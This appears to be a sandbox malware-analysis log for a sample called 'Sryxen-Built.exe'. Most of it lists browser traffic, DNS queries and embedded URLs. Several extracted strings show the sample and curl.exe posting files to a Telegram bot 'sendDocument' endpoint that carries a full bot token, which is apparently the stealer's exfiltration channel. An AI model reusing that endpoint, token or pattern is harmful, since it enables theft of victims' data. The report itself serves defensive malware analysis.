Source: global trafficHTTP traffic detected: GET /b?rn=1741477966956&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=30F2568B099669BF2FA4432208F968D1&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1741477966956&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=30F2568B099669BF2FA4432208F968D1&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=14Bcf338d98fb49ffa4de591741477967; XID=14Bcf338d98fb49ffa4de591741477967
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741477966956&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f8f53d427d648059cf06719c9a45f3f&activityId=7f8f53d427d648059cf06719c9a45f3f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=8CA0B8253F8443F78B148C9D4843A7AE&MUID=30F2568B099669BF2FA4432208F968D1 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1; SM=T
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.25sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 500sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; MUIDB=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=bba57e98-dec4-4122-92ef-c5d3b18d1008; ai_session=f0dMqmqQt01IQWgwiDeg+v|1741477966952|1741477966952; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z
Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":16,"imageId":"BB1msFQA","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; MUIDB=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=bba57e98-dec4-4122-92ef-c5d3b18d1008; ai_session=f0dMqmqQt01IQWgwiDeg+v|1741477966952|1741477966952; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: Sryxen-Built.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Sryxen-Built.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Sryxen-Built.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Sryxen-Built.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Sryxen-Built.exeString found in binary or memory: http://ocsp.sectigo.com0
Source: 8uliCbB.db.0.drString found in binary or memory: https://ac.ecosia.org?q=
Source: curl.exe, 00000009.00000002.1440413944.00000243B3790000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1440413944.00000243B3798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument
Source: curl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument1b
Source: curl.exe, 00000009.00000002.1440413944.00000243B37AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument=b
Source: curl.exe, 00000009.00000002.1440413944.00000243B3790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentC:
Source: Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentateteYO
Source: Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentlC:
Source: Sryxen-Built.exe, 00000000.00000002.1676028553.000002730010B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentp-AliveDa
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://assets.msn.cn/resolver/
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://assets.msn.com/resolver/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://bit.ly/wb-precache
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL0.6.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.6.drString found in binary or memory: https://c.msn.com/
Source: 8uliCbB.db.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: offscreendocument_main.js.6.dr, service_worker_bin_prod.js.6.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr, Web Data.6.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr, Web Data.6.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Network Persistent State.6.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: manifest.json.6.drString found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.6.drString found in binary or memory: https://chromewebstore.google.com/
Source: 2154d66b-73f0-4c55-9892-db1deced4afc.tmp.7.dr, cd6de0c2-5689-463b-803d-f69a9acb05b0.tmp.7.drString found in binary or memory: https://clients2.google.com
Source: Sryxen-Built.exe, 00000000.00000002.1676255001.00000273002AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
Source: manifest.json0.6.drString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 2154d66b-73f0-4c55-9892-db1deced4afc.tmp.7.dr, cd6de0c2-5689-463b-803d-f69a9acb05b0.tmp.7.drString found in binary or memory: https://clients2.googleusercontent.com
Source: Reporting and NEL0.6.drString found in binary or memory: https://deff.nelreports.net/api/report
Source: 2cc80dabc69f58b6_0.6.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL0.6.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json0.6.drString found in binary or memory: https://docs.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.6.drString found in binary or memory: https://drive.google.com/
Source: 8uliCbB.db.0.dr, Web Data.6.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.6.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: 8uliCbB.db.0.dr, Web Data.6.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log9.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log10.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log9.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
